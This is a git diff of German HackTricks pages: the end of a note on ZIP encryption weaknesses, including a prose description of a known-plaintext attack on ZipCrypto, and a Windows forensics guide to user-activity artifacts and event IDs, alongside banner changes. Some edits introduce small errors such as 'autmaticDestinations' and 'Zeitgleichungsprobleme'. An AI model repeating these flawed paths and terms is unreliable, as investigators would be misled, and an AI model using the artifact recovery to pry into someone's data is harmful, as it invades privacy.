verschlüsseln**, ein Sicherheitsfehler, der nicht bei RAR- oder 7z-Dateien auftritt, die diese Informationen verschlüsseln. Darüber hinaus sind Zip-Dateien, die mit der älteren ZipCrypto-Methode verschlüsselt sind, anfällig für einen **Klartextangriff**, wenn eine unverschlüsselte Kopie einer komprimierten Datei verfügbar ist. Dieser Angriff nutzt den bekannten Inhalt, um das Passwort der Zip-Datei zu knacken, eine Schwachstelle, die in einem Artikel von [HackThis](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detailliert beschrieben und in [diesem wissenschaftlichen Artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) weiter erläutert wird. Zip-Dateien, die mit der **AES-256**-Verschlüsselung gesichert sind, sind jedoch immun gegen diesen Klartextangriff, was die Bedeutung der Auswahl sicherer Verschlüsselungsmethoden für sensible Daten zeigt. ## Referenzen -* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) +* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 4c57d1564..d5fbeeb69 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -2,19 +2,20 @@ ## Windows Artefakte +{% hint style="success" %} +Lernen Sie & üben Sie AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %}
@@ -45,7 +46,7 @@ Heruntergeladene Dateien können die **ADS Zone.Identifier** enthalten, die anze Im Vista/Win7/Win8/Win10 befindet sich der **Papierkorb** im Ordner **`$Recycle.bin`** im Stammverzeichnis des Laufwerks (`C:\$Recycle.bin`).\ Wenn eine Datei in diesem Ordner gelöscht wird, werden 2 spezifische Dateien erstellt: -* `$I{id}`: Dateiinformationen (Datum des Löschens} +* `$I{id}`: Dateiinformationen (Datum des Löschens) * `$R{id}`: Inhalt der Datei ![](<../../../.gitbook/assets/image (486).png>) @@ -76,7 +77,7 @@ Die Registrierung `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` ent ### Office AutoSaved-Dateien -Sie können die automatisch gespeicherten Office-Dateien unter folgendem Pfad finden: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` +Sie können die automatisch gespeicherten Office-Dateien unter: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` finden. ## Shell-Elemente @@ -93,9 +94,9 @@ Wenn ein Ordner erstellt wird, wird auch eine Verknüpfung zum Ordner, zum über Diese automatisch erstellten Verknüpfungsdateien enthalten Informationen über die Herkunft, ob es sich um eine **Datei** oder einen **Ordner** handelt, **MAC-Zeiten** dieser Datei, **Volumeninformationen**, wo die Datei gespeichert ist, und **Ordner der Zieldatei**. Diese Informationen können nützlich sein, um diese Dateien wiederherzustellen, falls sie entfernt wurden. -Außerdem ist das **Erstelldatum der Verknüpfung** die erste **Zeit**, zu der die Originaldatei **erstmalig verwendet** wurde, und das **Änderungsdatum** der Verknüpfungsdatei ist die **letzte Zeit**, zu der die Ursprungsdatei verwendet wurde. +Außerdem ist das **Erstelldatum der Verknüpfung** die erste **Zeit**, zu der die Originaldatei **erstmalig verwendet** wurde, und das **Änderungsdatum der Verknüpfung** ist die **letzte** **Zeit**, zu der die Ursprungsdatei verwendet wurde. -Zur Inspektion dieser Dateien können Sie [**LinkParser**](http://4discovery.com/our-tools/) verwenden. +Um diese Dateien zu inspizieren, können Sie [**LinkParser**](http://4discovery.com/our-tools/) verwenden. In diesem Tool finden Sie **2 Sets** von Zeitstempeln: @@ -118,7 +119,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs Dies sind die zuletzt verwendeten Dateien pro Anwendung. Es handelt sich um eine Liste der **zuletzt verwendeten Dateien einer Anwendung**, auf die Sie in jeder Anwendung zugreifen können. Sie können **automatisch erstellt oder benutzerdefiniert sein**. -Die **automatisch erstellten Jumplists** werden unter `C:\Users\{Benutzername}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` gespeichert. Die Jumplists sind nach dem Format `{ID}.automaticDestinations-ms` benannt, wobei die anfängliche ID die ID der Anwendung ist. +Die automatisch erstellten **Jumplists** werden unter `C:\Users\{Benutzername}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` gespeichert. Die Jumplists sind nach dem Format `{id}.autmaticDestinations-ms` benannt, wobei die anfängliche ID die ID der Anwendung ist. Die benutzerdefinierten Jumplists werden unter `C:\Users\{Benutzername}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` gespeichert und werden in der Regel von der Anwendung erstellt, weil etwas **Wichtiges** mit der Datei passiert ist (vielleicht als Favorit markiert). @@ -146,7 +147,7 @@ Beachten Sie, dass einige LNK-Dateien anstelle des ursprünglichen Pfads auf den ![](<../../../.gitbook/assets/image (476).png>) -Die Dateien im WPDNSE-Ordner sind Kopien der Originaldateien, daher überleben sie keinen Neustart des PCs und die GUID wird aus einem Shellbag übernommen. +Die Dateien im Ordner WPDNSE sind Kopien der Originaldateien, daher überleben sie keinen Neustart des PCs und die GUID wird aus einem Shellbag übernommen. ### Registrierungsinformationen @@ -156,7 +157,7 @@ Die Dateien im WPDNSE-Ordner sind Kopien der Originaldateien, daher überleben s Überprüfen Sie die Datei `C:\Windows\inf\setupapi.dev.log`, um die Zeitstempel darüber zu erhalten, wann die USB-Verbindung hergestellt wurde (suchen Sie nach `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ### USB Detective @@ -166,7 +167,7 @@ Die Dateien im WPDNSE-Ordner sind Kopien der Originaldateien, daher überleben s ### Plug and Play Cleanup -Die geplante Aufgabe namens 'Plug and Play Cleanup' ist hauptsächlich für die Entfernung veralteter Treiberversionen konzipiert. Entgegen ihrem angegebenen Zweck, die neueste Treiberversion beizubehalten, deuten Online-Quellen darauf hin, dass sie auch Treiber löscht, die seit 30 Tagen inaktiv sind. Folglich können Treiber für entfernbare Geräte, die in den letzten 30 Tagen nicht angeschlossen wurden, gelöscht werden. +Die geplante Aufgabe namens 'Plug and Play Cleanup' ist hauptsächlich für die Entfernung veralteter Treiberversionen konzipiert. Entgegen ihrem festgelegten Zweck, die neueste Treiberversion beizubehalten, deuten Online-Quellen darauf hin, dass sie auch Treiber löscht, die seit 30 Tagen inaktiv sind. Folglich können Treiber für entfernbare Geräte, die in den letzten 30 Tagen nicht angeschlossen wurden, gelöscht werden. Die Aufgabe befindet sich unter dem folgenden Pfad: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. @@ -174,9 +175,9 @@ Die Aufgabe befindet sich unter dem folgenden Pfad: Ein Screenshot des Inhalts der Aufgabe wird bereitgestellt: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) -**Wichtige Komponenten und Einstellungen der Aufgabe:** +**Hauptkomponenten und Einstellungen der Aufgabe:** - **pnpclean.dll**: Diese DLL ist für den eigentlichen Bereinigungsvorgang verantwortlich. -- **UseUnifiedSchedulingEngine**: Auf `TRUE` gesetzt, was auf die Verwendung des generischen Taskplanungsmotors hinweist. +- **UseUnifiedSchedulingEngine**: Auf `TRUE` gesetzt, was auf die Verwendung des generischen Aufgabenplanungsmotors hinweist. - **MaintenanceSettings**: - **Periode ('P1M')**: Weist den Taskplaner an, die Bereinigungsaufgabe monatlich während der regulären automatischen Wartung zu starten. - **Frist ('P2M')**: Weist den Taskplaner an, die Aufgabe bei zwei aufeinanderfolgenden Monaten des Scheiterns während der Notfallautomatisierung durchzuführen. @@ -202,7 +203,7 @@ Diese Anwendung speichert E-Mails in HTML oder Text. Sie finden die E-Mails in U Die **Metadaten** der E-Mails und die **Kontakte** finden Sie in der **EDB-Datenbank**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -**Ändern Sie die Erweiterung** der Datei von `.vol` in `.edb` und Sie können das Tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) verwenden, um sie zu öffnen. In der Tabelle `Message` können Sie die E-Mails sehen. +**Ändern Sie die Erweiterung** der Datei von `.vol` in `.edb` und Sie können das Tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) verwenden, um es zu öffnen. Im `Message`-Tabellen können Sie die E-Mails sehen. ### Microsoft Outlook @@ -225,7 +226,7 @@ Sie können die PST-Datei mit dem Tool [**Kernel PST Viewer**](https://www.nucle ![](<../../../.gitbook/assets/image (485).png>) ### Microsoft Outlook OST-Dateien -Eine **OST-Datei** wird von Microsoft Outlook generiert, wenn es mit einem **IMAP**- oder einem **Exchange**-Server konfiguriert ist und ähnliche Informationen wie eine PST-Datei speichert. Diese Datei wird mit dem Server synchronisiert, behält Daten für **die letzten 12 Monate** bis zu einer **maximalen Größe von 50 GB** bei und befindet sich im selben Verzeichnis wie die PST-Datei. Um eine OST-Datei anzuzeigen, kann der [**Kernel OST-Viewer**](https://www.nucleustechnologies.com/ost-viewer.html) verwendet werden. +Eine **OST-Datei** wird von Microsoft Outlook generiert, wenn es mit einem **IMAP**- oder einem **Exchange**-Server konfiguriert ist und ähnliche Informationen wie eine PST-Datei speichert. Diese Datei wird mit dem Server synchronisiert und behält Daten für **die letzten 12 Monate** bis zu einer **maximalen Größe von 50 GB** bei und befindet sich im selben Verzeichnis wie die PST-Datei. Um eine OST-Datei anzuzeigen, kann der [**Kernel OST Viewer**](https://www.nucleustechnologies.com/ost-viewer.html) verwendet werden. ### Abrufen von Anhängen @@ -236,7 +237,7 @@ Verlorene Anhänge können aus folgenden Orten wiederhergestellt werden: ### Thunderbird MBOX-Dateien -**Thunderbird** verwendet **MBOX-Dateien** zur Speicherung von Daten, die sich unter `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` befinden. +**Thunderbird** verwendet **MBOX-Dateien**, um Daten zu speichern, die sich unter `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` befinden. ### Bildvorschauen @@ -244,14 +245,14 @@ Verlorene Anhänge können aus folgenden Orten wiederhergestellt werden: - **Windows 7/10**: `thumbs.db` wird erstellt, wenn über einen Netzwerkpfad über UNC zugegriffen wird. - **Windows Vista und neuere Versionen**: Miniaturansichten sind zentralisiert in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` mit Dateien namens **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) und [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) sind Tools zum Anzeigen dieser Dateien. -### Windows-Registrierungsinformationen +### Informationen in der Windows-Registrierung -Die Windows-Registrierung, die umfangreiche System- und Benutzeraktivitätsdaten speichert, ist in Dateien enthalten, die sich befinden in: +Die Windows-Registrierung, die umfangreiche System- und Benutzeraktivitätsdaten speichert, ist in Dateien enthalten in: - `%windir%\System32\Config` für verschiedene `HKEY_LOCAL_MACHINE`-Unterschlüssel. - `%UserProfile%{Benutzer}\NTUSER.DAT` für `HKEY_CURRENT_USER`. - Windows Vista und neuere Versionen sichern die Registrierungsdateien von `HKEY_LOCAL_MACHINE` zusätzlich in `%Windir%\System32\Config\RegBack\`. -- Darüber hinaus werden Informationen zur Programmausführung in `%UserProfile%\{Benutzer}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` ab Windows Vista und Windows 2008 Server gespeichert. +- Zusätzlich werden Informationen zur Programmausführung in `%UserProfile%\{Benutzer}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` ab Windows Vista und Windows 2008 Server gespeichert. ### Tools @@ -290,7 +291,7 @@ In [diesem Beitrag](https://jonahacks.medium.com/investigating-common-windows-pr ### Kürzlich verwendete Windows-Apps -In der Registrierung `NTUSER.DAT` im Pfad `Software\Microsoft\Current Version\Search\RecentApps` finden Sie Unterschlüssel mit Informationen über die **ausgeführte Anwendung**, den **letzten Ausführungszeitpunkt** und die **Anzahl der Ausführungen**. +In der Registrierung `NTUSER.DAT` im Pfad `Software\Microsoft\Current Version\Search\RecentApps` finden Sie Unterschlüssel mit Informationen über die **ausgeführte Anwendung**, den **letzten Zeitpunkt** der Ausführung und die **Anzahl der Ausführungen**. ### BAM (Background Activity Moderator) @@ -298,7 +299,7 @@ Sie können die Datei `SYSTEM` mit einem Registrierungseditor öffnen und im Pfa ### Windows Prefetch -Prefetching ist eine Technik, die es einem Computer ermöglicht, stillschweigend die **notwendigen Ressourcen abzurufen, die benötigt werden, um Inhalte anzuzeigen**, auf die ein Benutzer **möglicherweise in naher Zukunft zugreifen wird**, damit Ressourcen schneller abgerufen werden können. +Prefetching ist eine Technik, die es einem Computer ermöglicht, **die für die Anzeige von Inhalten benötigten Ressourcen stillschweigend abzurufen**, auf die ein Benutzer **möglicherweise in naher Zukunft zugreifen wird**, damit Ressourcen schneller abgerufen werden können. Windows Prefetch besteht darin, **Caches der ausgeführten Programme** zu erstellen, um sie schneller laden zu können. Diese Caches werden als `.pf`-Dateien im Pfad erstellt: `C:\Windows\Prefetch`. Es gibt eine Begrenzung von 128 Dateien in XP/VISTA/WIN7 und 1024 Dateien in Win8/Win10. @@ -317,15 +318,15 @@ Um diese Dateien zu inspizieren, können Sie das Tool [**PEcmd.exe**](https://gi **Superprefetch** hat das gleiche Ziel wie prefetch, **Programme schneller laden**, indem vorhergesagt wird, was als nächstes geladen wird. Es ersetzt jedoch nicht den prefetch-Dienst.\ Dieser Dienst generiert Datenbankdateien in `C:\Windows\Prefetch\Ag*.db`. -In diesen Datenbanken finden Sie den **Namen des Programms**, die **Anzahl der Ausführungen**, die **geöffneten Dateien**, den **zugriffenen Speicher**, den **vollständigen Pfad**, die **Zeitrahmen** und die **Zeitstempel**. +In diesen Datenbanken finden Sie den **Namen** des **Programms**, die **Anzahl** der **Ausführungen**, die **geöffneten Dateien**, den **zugriffenen Speicher**, den **vollständigen Pfad**, die **Zeitrahmen** und die **Zeitstempel**. Sie können auf diese Informationen mit dem Tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) zugreifen. ### SRUM -Der **System Resource Usage Monitor** (SRUM) **überwacht** die **Ressourcen**, die von einem Prozess **verbraucht** werden. Er erschien in W8 und speichert die Daten in einer ESE-Datenbank, die sich in `C:\Windows\System32\sru\SRUDB.dat` befindet. +**System Resource Usage Monitor** (SRUM) **überwacht** die **Ressourcen**, die von einem Prozess **verbraucht** werden. Es erschien in W8 und speichert die Daten in einer ESE-Datenbank, die sich in `C:\Windows\System32\sru\SRUDB.dat` befindet. -Er gibt folgende Informationen: +Es liefert folgende Informationen: * AppID und Pfad * Benutzer, der den Prozess ausgeführt hat @@ -343,7 +344,7 @@ Sie können die Daten aus dieser Datei mit dem Tool [**srum\_dump**](https://git ``` ### AppCompatCache (ShimCache) -Der **AppCompatCache**, auch bekannt als **ShimCache**, bildet einen Teil der von **Microsoft** entwickelten **Application Compatibility Database**, um Probleme mit der Anwendungskompatibilität zu lösen. Dieses Systemkomponente zeichnet verschiedene Dateimetadaten auf, die Folgendes beinhalten: +Der **AppCompatCache**, auch bekannt als **ShimCache**, bildet einen Teil der von **Microsoft** entwickelten **Application Compatibility Database**, um Probleme mit der Anwendungskompatibilität zu lösen. Dieses Systemkomponente zeichnet verschiedene Stücke von Dateimetadaten auf, die Folgendes beinhalten: - Vollständiger Pfad der Datei - Größe der Datei @@ -351,7 +352,7 @@ Der **AppCompatCache**, auch bekannt als **ShimCache**, bildet einen Teil der vo - Letzte Aktualisierungszeit des ShimCache - Prozessausführungsflag -Diese Daten werden in der Registrierung an spezifischen Standorten basierend auf der Version des Betriebssystems gespeichert: +Diese Daten werden in der Registrierung an spezifischen Orten basierend auf der Version des Betriebssystems gespeichert: - Für XP werden die Daten unter `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` mit einer Kapazität von 96 Einträgen gespeichert. - Für Server 2003 sowie für Windows-Versionen 2008, 2012, 2016, 7, 8 und 10 lautet der Speicherpfad `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, wobei jeweils 512 bzw. 1024 Einträge Platz finden. @@ -362,11 +363,11 @@ Zur Analyse der gespeicherten Informationen wird die Verwendung des [**AppCompat ### Amcache -Die Datei **Amcache.hve** ist im Wesentlichen eine Registrierungshive, die Details über auf einem System ausgeführte Anwendungen protokolliert. Sie wird typischerweise unter `C:\Windows\AppCompat\Programas\Amcache.hve` gefunden. +Die Datei **Amcache.hve** ist im Wesentlichen eine Registrierungshive, die Details über Anwendungen protokolliert, die auf einem System ausgeführt wurden. Sie befindet sich typischerweise unter `C:\Windows\AppCompat\Programas\Amcache.hve`. Diese Datei ist bemerkenswert, da sie Aufzeichnungen über kürzlich ausgeführte Prozesse speichert, einschließlich der Pfade zu den ausführbaren Dateien und ihrer SHA1-Hashes. Diese Informationen sind von unschätzbarem Wert, um die Aktivität von Anwendungen auf einem System zu verfolgen. -Zur Extraktion und Analyse der Daten aus **Amcache.hve** kann das [**AmcacheParser**-Tool](https://github.com/EricZimmerman/AmcacheParser) verwendet werden. Das folgende Beispiel zeigt, wie AmcacheParser verwendet wird, um den Inhalt der **Amcache.hve**-Datei zu analysieren und die Ergebnisse im CSV-Format auszugeben: +Um die Daten aus **Amcache.hve** zu extrahieren und zu analysieren, kann das [**AmcacheParser**-Tool](https://github.com/EricZimmerman/AmcacheParser) verwendet werden. Das folgende Beispiel zeigt, wie AmcacheParser verwendet wird, um den Inhalt der Datei **Amcache.hve** zu analysieren und die Ergebnisse im CSV-Format auszugeben: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` @@ -390,12 +391,12 @@ Sie finden sie in der Registrierung unter `SYSTEM\ControlSet001\Services`. Sie k ### **Windows Store** -Die installierten Anwendungen finden Sie in `\ProgramData\Microsoft\Windows\AppRepository\`\ +Die installierten Anwendungen können in `\ProgramData\Microsoft\Windows\AppRepository\` gefunden werden.\ Dieses Repository enthält ein **Protokoll** mit **jeder installierten Anwendung** im System innerhalb der Datenbank **`StateRepository-Machine.srd`**. -In der Anwendungstabelle dieser Datenbank können die Spalten "Anwendungs-ID", "PackageNumber" und "Anzeigename" gefunden werden. Diese Spalten enthalten Informationen über vorinstallierte und installierte Anwendungen, und es kann festgestellt werden, ob einige Anwendungen deinstalliert wurden, da die IDs der installierten Anwendungen sequenziell sein sollten. +In der Anwendungstabelle dieser Datenbank ist es möglich, die Spalten "Anwendungs-ID", "Paketnummer" und "Anzeigename" zu finden. Diese Spalten enthalten Informationen über vorinstallierte und installierte Anwendungen, und es kann festgestellt werden, ob einige Anwendungen deinstalliert wurden, da die IDs installierter Anwendungen sequenziell sein sollten. -Es ist auch möglich, **installierte Anwendungen** im Registrierungspfad zu finden: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +Es ist auch möglich, **installierte Anwendungen** im Registrierungspfad zu **finden**: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ Und **deinstallierte Anwendungen** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` ## Windows-Ereignisse @@ -412,7 +413,7 @@ Die Protokolle befinden sich in `C:\Windows\System32\config` vor Windows Vista u Der Speicherort der Ereignisdateien kann in der SYSTEM-Registrierung unter **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Anwendung|System|Sicherheit}`** gefunden werden. -Sie können sie mit dem Windows-Ereignisbetrachter (**`eventvwr.msc`**) oder mit anderen Tools wie [**Event Log Explorer**](https://eventlogxp.com) **oder** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** visualisieren.** +Sie können sie aus dem Windows-Ereignisbetrachter (**`eventvwr.msc`**) oder mit anderen Tools wie [**Event Log Explorer**](https://eventlogxp.com) **oder** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** visualisieren.** ## Verständnis der Protokollierung von Windows-Sicherheitsereignissen @@ -420,12 +421,12 @@ Zugriffsereignisse werden in der Sicherheitskonfigurationsdatei aufgezeichnet, d ### Schlüsselereignis-IDs für die Benutzerauthentifizierung: -- **EventID 4624**: Zeigt eine erfolgreiche Benutzerauthentifizierung an. -- **EventID 4625**: Signalisiert ein Authentifizierungsfehler. -- **EventIDs 4634/4647**: Stellen Benutzerabmeldeereignisse dar. -- **EventID 4672**: Kennzeichnet die Anmeldung mit administrativen Berechtigungen. +- **Ereignis-ID 4624**: Zeigt eine erfolgreiche Benutzerauthentifizierung an. +- **Ereignis-ID 4625**: Signalisiert ein Authentifizierungsfehler. +- **Ereignisse 4634/4647**: Stellen Benutzerabmeldeereignisse dar. +- **Ereignis-ID 4672**: Kennzeichnet die Anmeldung mit administrativen Berechtigungen. -#### Untertypen innerhalb von EventID 4634/4647: +#### Untertypen innerhalb von Ereignis-ID 4634/4647: - **Interaktiv (2)**: Direkte Benutzeranmeldung. - **Netzwerk (3)**: Zugriff auf freigegebene Ordner. @@ -433,14 +434,14 @@ Zugriffsereignisse werden in der Sicherheitskonfigurationsdatei aufgezeichnet, d - **Dienst (5)**: Dienststarts. - **Proxy (6)**: Proxy-Authentifizierung. - **Entsperren (7)**: Bildschirm mit einem Passwort entsperrt. -- **Netzwerk im Klartext (8)**: Übertragung von Klartextpasswörtern, oft von IIS. +- **Netzwerkklartext (8)**: Klartextpasswortübertragung, oft von IIS. - **Neue Anmeldeinformationen (9)**: Verwendung unterschiedlicher Anmeldeinformationen für den Zugriff. -- **Remote-Interaktiv (10)**: Anmeldung über Remote-Desktop oder Terminaldienste. -- **Zwischengespeichert interaktiv (11)**: Anmeldung mit zwischengespeicherten Anmeldeinformationen ohne Kontakt zum Domänencontroller. -- **Zwischengespeichert remote-interaktiv (12)**: Remote-Anmeldung mit zwischengespeicherten Anmeldeinformationen. -- **Zwischengespeichert entsperren (13)**: Entsperren mit zwischengespeicherten Anmeldeinformationen. +- **Remote-Interaktiv (10)**: Remote-Desktop- oder Terminaldienste-Anmeldung. +- **Cache-Interaktiv (11)**: Anmeldung mit zwischengespeicherten Anmeldeinformationen ohne Kontakt zum Domänencontroller. +- **Cache-Remote-Interaktiv (12)**: Remote-Anmeldung mit zwischengespeicherten Anmeldeinformationen. +- **Zwischengespeichertes Entsperren (13)**: Entsperren mit zwischengespeicherten Anmeldeinformationen. -#### Status- und Untertypencodes für EventID 4625: +#### Status- und Untertypencodes für Ereignis-ID 4625: - **0xC0000064**: Benutzername existiert nicht - Könnte auf einen Benutzernamensenumerationsangriff hinweisen. - **0xC000006A**: Richtiger Benutzername, aber falsches Passwort - Möglicherweise ein Versuch zum Erraten oder Brute-Forcen von Passwörtern. @@ -450,28 +451,28 @@ Zugriffsereignisse werden in der Sicherheitskonfigurationsdatei aufgezeichnet, d - **0xC0000070**: Verstoß gegen die Arbeitsstationseinschränkungen - Könnte ein Versuch sein, sich von einem nicht autorisierten Ort aus anzumelden. - **0xC0000193**: Ablauf des Kontos - Zugriffsversuche mit abgelaufenen Benutzerkonten. - **0xC0000071**: Abgelaufenes Passwort - Anmeldeversuche mit veralteten Passwörtern. -- **0xC0000133**: Zeit-Synchronisierungsprobleme - Große Zeitunterschiede zwischen Client und Server können auf anspruchsvollere Angriffe wie Pass-the-Ticket hinweisen. +- **0xC0000133**: Zeitgleichungsprobleme - Große Zeitunterschiede zwischen Client und Server können auf anspruchsvollere Angriffe wie Pass-the-Ticket hinweisen. - **0xC0000224**: Erforderliche obligatorische Passwortänderung - Häufige obligatorische Änderungen könnten auf einen Versuch hindeuten, die Kontosicherheit zu destabilisieren. - **0xC0000225**: Deutet auf einen Systemfehler hin, nicht auf ein Sicherheitsproblem. - **0xC000015b**: Verweigerte Anmeldetyp - Zugriffsversuch mit nicht autorisiertem Anmeldetyp, z. B. ein Benutzer, der versucht, eine Dienstanmeldung auszuführen. -#### EventID 4616: -- **Zeitänderung**: Änderung der Systemzeit, könnte die zeitliche Abfolge von Ereignissen verschleiern. +#### Ereignis-ID 4616: +- **Zeitänderung**: Änderung der Systemzeit, könnte die Zeitachse der Ereignisse verschleiern. -#### EventID 6005 und 6006: -- **Systemstart und -abschaltung**: EventID 6005 zeigt den Systemstart an, während EventID 6006 das Herunterfahren markiert. +#### Ereignis-ID 6005 und 6006: +- **Systemstart und -abschaltung**: Ereignis-ID 6005 zeigt den Systemstart an, während Ereignis-ID 6006 das Herunterfahren markiert. -#### EventID 1102: -- **Protokolllöschung**: Sicherheitsprotokolle werden gelöscht, was oft ein Hinweis auf das Vertuschen von illegalen Aktivitäten ist. +#### Ereignis-ID 1102: +- **Protokolllöschung**: Sicherheitsprotokolle werden gelöscht, was oft ein Warnzeichen für das Vertuschen von illegalen Aktivitäten ist. -#### EventIDs für die Verfolgung von USB-Geräten: +#### Ereignis-IDs für die Verfolgung von USB-Geräten: - **20001 / 20003 / 10000**: Erstverbindung des USB-Geräts. - **10100**: USB-Treiberupdate. -- **EventID 112**: Zeitpunkt des Einsteckens des USB-Geräts. +- **Ereignis-ID 112**: Zeitpunkt des 